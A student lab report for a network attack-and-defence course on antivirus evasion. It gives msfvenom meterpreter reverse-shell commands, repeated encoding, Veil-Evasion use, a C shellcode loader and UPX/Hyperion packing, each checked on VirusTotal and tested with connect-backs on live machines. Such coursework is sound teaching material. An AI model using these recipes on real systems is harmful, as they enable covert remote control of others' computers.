2018-2019-2 网络对抗技术 20165336 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165336 Exp3 免杀原理与实践
1.基础问题回答
(1)杀软是如何检测出恶意代码的?
- 根据计算机病毒课程知道了每个病毒都有其对应的特征码,杀软是根据这些特征码来判定他是不是病毒。
- 根据该软件的行为进行检测如有异常行为,会被判定为风险文件或病毒。
- 基于行为的恶意软件检测:在启发式基础上对软件行为进行监控
(2)免杀是做什么?
通过一定的技术手段,将恶意软件处理,使之不会被杀毒软件发现。
(3)免杀的基本方法有哪些?
- 改变特征码:对于.exe文件可以加壳,对于shellcode可以进行加密然后利用shellcode生成可执行文件,或者用其他语言进行重写再编译
- 改变行为:根据改变通讯模式、操作模式来实现免杀。
2. 实践内容
任务一: 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)
1.使用VirusTotal或Virscan这两个网站对实验二生成的后门程序进行扫描。
- VirusTotal扫描后结果如下:



2.用msf编码器对后门程序进行一次到多次的编码,并进行检测。
- 一次编码使用命令:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.241 LPORT=5336 -f exe > met-encoded.exe

VirusTotal扫描后结果如下:

十次编码使用命令:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.241 LPORT=5336 -f exe > met-encoded10.exe

- VirusTotal扫描后结果如下:

3.msfvenom生成jar文件、php文件
生成java后门程序使用命令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.241 LPORT=5336 x> 5336_backdoor_java.jar

VirusTotal扫描后结果如下:

生成php后门程序使用命令:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.241 LPORT=5336 x> 5336_backdoor.php

VirusTotal扫描后结果如下:

4.使用veil-evasion生成后门程序及检测
- 安装veil
自我尝试方法一:sudo apt-get install veil安装了一个多小时报错,根据问题查找学长学姐的博客和百度最终的原因似乎是因为kali的版本与veil的版本不匹配导致安装失败,还有一个原因是校园网的原因,会导致下载不完全安装出错(网速不好真的难受)。

方法二:使用代理安装,时间比较久需要耐心
# apt-get install libncurses5*
# apt-get install libavutil55*
# apt-get install gcc-mingw-w64*
# apt-get install wine32
# git clone https://github.com/Veil-Framework/Veil
# cd Veil/setup/
# ./setup.sh

- 安好后
use evasion命令进入Evil-Evasion

- 输入命令
use c/meterpreter/rev_tcp.py进入配置界面

- 设置反弹连接IP,
set LHOST 192.168.1.24,IP是KaliIP;设置端口set LPORT 5336

- 指令
generate生成文件,输入playload的名字:veil_c_5336

- VirusTotal扫描后结果如下:

5.手工注入Shellcode并执行
- 使用命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.241 LPORT=5336 -f c用c语言生成一段shellcode;

vim 20165336.c,然后将unsigned char buf[]赋值到其中
unsigned char buf[] =
代码
int main()
{
int (*func)() = (int(*)())buf;
func();
}
- 使用命令:
i686-w64-mingw32-g++ 20165336.c -o 20165336.exe编译这个.c文件为可执行文件;

- VirusTotal扫描后结果如下:

6.加壳尝试
- 加压缩壳
upx 20165336.exe -o 20165336_uped.exe

- VirusTotal扫描后结果如下:

- 加密壳Hyperion:进入目录
/usr/share/windows-binaries/hyperion/中将20165336_uped.exe拷贝进来并用wine hyperion.exe -v 20165336_upxed.exe 20165336_upxed_Hyperion.exe进行加壳


- VirusTotal扫描后结果如下:

任务一小感想
经过前面的操作,我发现对于防止杀毒软件查杀的效果,只有加压缩、加密壳免杀的效果会好一点,其他的都容易被发现。

任务二:通过组合应用各种技术实现恶意代码免杀(0.5分)
- 用codeblocks的C语言将前面的
.c文件里的shellcode加密(加密方式为加五在异或0x66)得到下图的shellcode,然后在进行加压缩壳。

- 实现免杀效果,并回连成功(自己的杀软为腾讯电脑管家)。


任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)
- 对舍友电脑进行免杀效果测试并回连成功(舍友的杀软为最新的360安全卫士11)


3.遇到的问题
1.安装veil时出现错误,见上文。
2.在进行加密shellcode需要将.exe文件在win10编译后放入kali,结果我的共享文件夹出问题了,找不到她了,解决办法:
sudo vmhgfs-fuse .host:/共享文件名字 /mnt/hgfs,然后共享文件就出现了。
4.开启杀软能绝对防止电脑中恶意代码吗?
- 我认为不能绝对的防止电脑中恶意代码,因为杀软更新的速度肯定赶不上病毒软件被创新开发出来的速度,对于现在学习的简单免杀技术有时候都能使杀毒软件查杀不出来,况且如果学习的更深入,了解的知识足够多我相信,随随便便攻破杀软都是小事情。并且新的入侵方法也在被不断的开发出来,如果杀软报的是风险软件没有报病毒软件,不懂电脑的人将其忽略并启动运行依旧会导致电脑中恶意代码,所以并不能绝对防止电脑中恶意代码。
5.实践总结与体会
这次实验我是带着很浓厚的兴趣去做的,在这过程中从一开始的msf熟悉到veil的安装再到shellcode变换加壳,我经历过许多困难,尤其是安装veil还把我的kali弄炸了,还好之前备份过不然又得从头安装kali,从后面的免杀结果来看,反而是shellcode加密然后加压缩壳会好一些,但有时候还会被杀毒软件查杀出来,估计是病毒库的不断更新,在免杀效果的实验测试中,我测了我三个舍友的电脑,有联想、惠普的总的来说联想自带的电脑管家+360的防护措施会比较好,惠普安装的360在一开始查杀不出来但经过一段时间后,也依旧能查杀出来,这让我知道病毒库的更新是多么的重要,对于shellcode的加密我认为还有很多种方法,我相信在之后的不断学习中,当我了解更多的知识,我实现免杀效果的方法会更多,成功率会更高,总的来说加强对病毒的防范很重要,防范不规范,蓝屏两行泪啊~~
2018-2019-2 网络对抗技术 20165336 Exp3 免杀原理与实践的更多相关文章
- 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践
2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...
- 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...
- 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...
- 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...
- 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...
- 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...
- 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践
2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...
随机推荐
- mvc webapi+autofac + session 的使用
先说说我的项目情况:MVC5+AUTOFAC,下面就直接说说怎么加入webapi.autofac的配置.登录使用session 一.MVC5添加WEBAPI 1.添加 参考文章:https://blo ...
- GitHub界面初识
现在很多 HR 在招聘程序员的需求都会提到「有 Github 项目者优先」,大部分求职者也会在简历中附上 Github 链接. 作为一个专业的 HR,即便不懂代码,也不能被一个链接唬住.今天我就手 ...
- LabVIEW--好书推荐与分享
LabVIEW宝典 此书可以作为工具书,配合LabVIEW的范例程序学习可以达到事半功倍的效果. 链接:https://pan.baidu.com/s/17jm6PznLyGW8rVQ_veaGCg ...
- Python-Django 视图层
1 request对象 method:请求方式 GET:get请求的参数(post请求,也可以携带参数) POST:post请求的参数(本质是从bdoy中取出来,放到里面了) COOKIES---&g ...
- C# .Net List<T>中Remove()、RemoveAt()、RemoveRange()、RemoveAll()的区别,List<T>删除汇总
在List<T>中删除主要有Remove().RemoveAt().RemoveRange().RemoveAll()这几个方法.下面一一介绍使用方法和注意点. 我们以List<st ...
- CS DevExpress程序启动(主窗体初始化优化)
在进入程序主界面时,某些情况下主界面的初始化会消耗很长时间,例如一些复杂的业务系统,可能会从服务器上下载最新的数据进行展示等等,在这种情况下,我们可以采用一个进度界面展示“系统正在加载...”,等主界 ...
- 005-Spring Boot配置分析-配置文件application、EnvironmentPostProcessor、Profiles
一.配置文件application 默认配置文件application.propertie或者application.yml,可同时存在 application.propertie增加配置:local ...
- git 切换远程仓库,以及碰到的一个问题。
git 切换远程仓库出现如下问题: $ git checkout -b localdev origin/dev fatal: Cannot update paths and switch to bra ...
- jsp填坑:找不到属性
javax.el.PropertyNotFoundException: Property [***] not found on type 接手的项目的页面是用jsp写的,虽然再有十几天就2019年了, ...
- 网页布局之flex
Flex是Flexible Box的缩写,意为“弹性布局”,用来为盒状模型提供最大的灵活性.设为Flex布局以后,子元素的float.clear和vertical-align属性将失效.使用flex ...